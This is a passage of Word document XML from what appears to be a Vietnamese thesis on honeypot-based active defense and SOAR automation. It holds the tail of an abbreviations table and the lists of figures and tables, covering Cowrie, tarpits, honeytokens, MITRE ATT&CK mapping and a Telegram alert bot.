                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10994EA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Máy chủ điều khiển mạng máy tính ma (Botnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="36C3C1D1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5848D55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MTTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D2DFC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Mean Time to Respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="683E3D5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Thời gian trung bình để phản ứng và xử lý sự cố</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="64DE6A3F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EEF43E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MTTD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C0C814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Mean Time to Detect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56C87FD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Thời gian trung bình để phát hiện sự cố an ninh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="220AB97C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="439EE3B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Tarpit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="419345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Connection Tarpitting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49DF995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Kỹ thuật làm chậm và giam giữ kết nối mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="11F0BE0F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="107A8ED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Canary Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48C6517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Honeytoken / Canary Webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B3095D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Dữ liệu mồi nhử dùng để phát hiện đánh cắp và lộ lọt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BB80968"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3E4DD151" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63F7E7"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DANH MỤC HÌNH VẼ MINH HỌA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A2CD6"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0.2: Danh mục các hình vẽ và biểu đồ trong đồ án</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>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0117C0FA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0506F85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Ký hiệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7772F3E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hình minh họa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1003E93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Trang</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="443F2172" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0752D4F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2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FBFFC2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Mô hình phân loại Honeypot theo mức độ tương tác (Low, Medium, High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5338C73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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="768E9CCB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44F2E4D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2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3541B81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Kiến trúc mô phỏng hệ thống tệp và lệnh của Cowrie Honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="354015B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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="7B35BE59" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58220D3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2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D62897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Vòng đời xử lý sự cố an ninh chuẩn NIST SP 800-61 r2 tích hợp SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="383F9B4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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="10DE8957" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57D453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3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="078D355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Sơ đồ kiến trúc tổng thể 5 phân lớp của Hệ sinh thái Active Defense &amp; SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F4478E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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="3BE1F61A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44477F2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3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05E6165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Lưu đồ thuật toán Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66F40EA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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="7D0EFC20" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66AB257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3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EC89D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Cơ chế bẫy mồi Honeytoken và khử ẩn danh kẻ tấn công (De-anonymization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="013F864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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="358B6F2D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42EB498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3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="577035E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Giao diện Thẻ cảnh báo và Bàn phím tương tác Inline Buttons của Telegram SOAR Bot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06D1B14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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="5F226145" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4134DE8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3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="244997F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Sơ đồ Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Cluster Architecture)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3657BE0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31</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="42822057" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44FA738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5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="572EC54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Đo lường Hiệu quả Làm chậm &amp; Triệt tiêu Tấn công của Cơ chế Tarpit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="385225D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34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="63FD72AB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="151F79C8"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5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="738FAEC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 sánh Thời gian Phản ứng Sự cố: Quy trình Thủ công vs Tự động hóa SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A308F7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36</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="773000AD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D24F62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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E04A69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Biểu đồ phân bố Kỹ thuật Tấn công ghi nhận trên Cowrie (Chuẩn MITRE ATT&amp;CK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7378AA7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38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0796D347"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403409F5" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EDA91"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DANH MỤC BẢNG BIỂU DỮ LIỆU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3A8FE"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0.3: Danh mục bảng biểu dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a1"/>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45FD0514" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0736FA9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Ký hiệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6337E59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bảng dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="726FCC4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Trang</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="3EE0A14C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16B8B42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0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46E3CE2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giải nghĩa các thuật ngữ viết tắt trong đồ án</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C68786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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="5E48FA51" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A98C73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0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="621E497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Danh mục các hình vẽ và biểu đồ trong đồ án</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EF5299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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="16E9CAC5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30B7D0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0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16BF739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Danh mục bảng biểu dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49C147B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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="32D59EE9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2214A8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1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D8C6FA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 sánh sự khác biệt giữa Triển khai Ứng dụng Bề nổi và Hệ thống Active Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FA4080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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="7ADF869E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="483E0F5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2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FE017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Ma trận so sánh các dòng Honeypot phổ biến (Dionaea, Cowrie, Conpot, Glastopf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22F3B7D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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="5A44B12D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C3C565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2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61C9BDB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 sánh khía cạnh Pháp lý và Kỹ thuật: Hack-back vs Active Defense (MITRE Engage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1381166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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="0F59F18F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="184DE3B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3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F24B6B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ánh xạ các Sự kiện Cowrie sang Ma trận Kỹ thuật MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E81A9C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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
